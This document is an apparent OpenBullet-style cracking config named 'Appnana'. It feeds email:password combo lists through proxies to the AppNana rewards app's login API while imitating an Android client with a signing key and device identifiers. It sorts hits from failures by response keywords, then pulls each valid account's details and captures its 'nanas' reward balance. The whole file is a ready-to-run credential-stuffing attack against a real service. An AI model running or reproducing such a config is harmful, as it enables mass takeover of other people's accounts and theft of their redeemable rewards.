[SETTINGS]
{
  "Name": "Appnana",
  "SuggestedBots": 150,
  "LastModified": "2018-05-15T20:59:26.284954+00:00",
  "AdditionalInfo": "",
  "Author": "Chaos",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Post_Data REQUEST POST "https://appnana2.mapiz.com/api/nanaer_login/" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>&source=Android.google-play&signkey=82393cb9d2851a21cee7ed967a4fe0412bd9493d&android_id=ba9502ebcb920d05&version=3.5.2&gaid=b47970a7-8fe0-487d-8222-4020dc156403&gaid_enabled=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: com.appnana.android.giftcardrewards/3.5.2 (Linux; U; Android 6.0; ar-EG; Lenovo A7000-a Build/MRA58K; Lenovo) a`h`Xaib` LENOVO Lenovo A7000-a" 
  HEADER "Pragma: no-cache" 
#Keywords KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "SUCCESS" 
  KEYCHAIN Failure OR 
    KEY "invalid login" 
#Get_Account_Details REQUEST GET "https://appnana2.mapiz.com/api/get_nanaer_info/?email=<USER>" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: com.appnana.android.giftcardrewards/3.5.2 (Linux; U; Android 6.0; ar-EG; Lenovo A7000-a Build/MRA58K; Lenovo) a`h`Xaib` LENOVO Lenovo A7000-a" 
  HEADER "Pragma: no-cache" 
#Capture_Nanas PARSE "<SOURCE>" LR "\"nanas\":" "," Recursive=FALSE -> CAP "Nanas" "" "" 
